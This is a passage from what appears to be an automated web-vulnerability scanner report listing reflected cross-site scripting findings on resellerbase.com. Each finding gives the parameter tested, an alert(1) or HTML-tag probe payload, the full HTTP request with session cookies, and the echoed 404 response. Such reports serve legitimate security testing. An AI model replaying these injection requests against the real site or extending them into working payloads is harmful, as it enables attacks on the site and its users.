The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1371<script>alert(1)</script>d1cb6ee4e1eb27149 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /detaild1371<script>alert(1)</script>d1cb6ee4e1eb27149/29/rating.php?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild1371<script>alert(1)</script>d1cb6ee4e1eb27149/29/rating.php?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.1997. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6618<script>alert(1)</script>367a6a2284f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29b6618<script>alert(1)</script>367a6a2284f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29b6618<script>alert(1)</script>367a6a2284f/rating.php was not found on this server.</p>
...[SNIP]...

2.1998. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df3af<script>alert(1)</script>605084808c59072aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/29df3af<script>alert(1)</script>605084808c59072aa/rating.php?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29df3af<script>alert(1)</script>605084808c59072aa/rating.php?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.1999. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e6ca5<script>alert(1)</script>b9322c325b6fce2c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/29/rating.phpe6ca5<script>alert(1)</script>b9322c325b6fce2c1?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.phpe6ca5<script>alert(1)</script>b9322c325b6fce2c1?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.2000. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b468<script>alert(1)</script>61b7f6dde03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/rating.php5b468<script>alert(1)</script>61b7f6dde03 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.php5b468<script>alert(1)</script>61b7f6dde03 was not found on this server.</p>
...[SNIP]...

2.2001. http://www.resellerbase.com/detail/29/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8ef3c<script>alert(1)</script>2016eb0283c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/rating.php?8ef3c<script>alert(1)</script>2016eb0283c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.php?8ef3c<script>alert(1)</script>2016eb0283c=1 was not found on this server.</p>
...[SNIP]...

2.2002. http://www.resellerbase.com/detail/29/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e46b<script>alert(1)</script>8860077c8849224da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/29/rating.php/7e46b<script>alert(1)</script>8860077c8849224da?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.php/7e46b<script>alert(1)</script>8860077c8849224da?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.2003. http://www.resellerbase.com/detail/29/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50e80<script>alert(1)</script>d869feed3d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50e80<script>alert(1)</script>d869feed3d6/29/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50e80<script>alert(1)</script>d869feed3d6/29/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2004. http://www.resellerbase.com/detail/29/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa918<script>alert(1)</script>2527d2151a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29fa918<script>alert(1)</script>2527d2151a3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29fa918<script>alert(1)</script>2527d2151a3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2005. http://www.resellerbase.com/detail/29/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8a84d<script>alert(1)</script>c2ad2baa2f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/search.php8a84d<script>alert(1)</script>c2ad2baa2f0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php8a84d<script>alert(1)</script>c2ad2baa2f0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2006. http://www.resellerbase.com/detail/29/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 95613<a>5af059702bb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search95613<a>5af059702bb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...&Submit3=Search95613<a>5af059702bb&opt=2 was not found on this server.</p>
...[SNIP]...

2.2007. http://www.resellerbase.com/detail/29/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b9d50<a>e032d6dab0e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/search.php?keyword=search...b9d50<a>e032d6dab0e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...b9d50<a>e032d6dab0e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2008. http://www.resellerbase.com/detail/29/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8793a<script>alert(1)</script>bf148951d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search&opt=2&8793a<script>alert(1)</script>bf148951d48=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...&Submit3=Search&opt=2&8793a<script>alert(1)</script>bf148951d48=1 was not found on this server.</p>
...[SNIP]...

2.2009. http://www.resellerbase.com/detail/29/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8e861<a>b7dd195f1bb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search&opt=28e861<a>b7dd195f1bb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...&Submit3=Search&opt=28e861<a>b7dd195f1bb was not found on this server.</p>
...[SNIP]...

2.2010. http://www.resellerbase.com/detail/29/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fda04<script>alert(1)</script>485ac04a9b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfda04<script>alert(1)</script>485ac04a9b7/29/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfda04<script>alert(1)</script>485ac04a9b7/29/themes/ was not found on this server.</p>
...[SNIP]...

2.2011. http://www.resellerbase.com/detail/29/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eecad<script>alert(1)</script>8d035c160b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29eecad<script>alert(1)</script>8d035c160b1/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29eecad<script>alert(1)</script>8d035c160b1/themes/ was not found on this server.</p>
...[SNIP]...

2.2012. http://www.resellerbase.com/detail/29/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8767e<script>alert(1)</script>4811ada4aea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes8767e<script>alert(1)</script>4811ada4aea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes8767e<script>alert(1)</script>4811ada4aea/ was not found on this server.</p>
...[SNIP]...

2.2013. http://www.resellerbase.com/detail/29/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1397<script>alert(1)</script>f57cd11fd09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/?d1397<script>alert(1)</script>f57cd11fd09=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/?d1397<script>alert(1)</script>f57cd11fd09=1 was not found on this server.</p>
...[SNIP]...

2.2014. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bf5a<script>alert(1)</script>fd05d3c1b7f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1bf5a<script>alert(1)</script>fd05d3c1b7f/29/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1bf5a<script>alert(1)</script>fd05d3c1b7f/29/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2015. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cefb9<script>alert(1)</script>104fe8229fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29cefb9<script>alert(1)</script>104fe8229fe/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
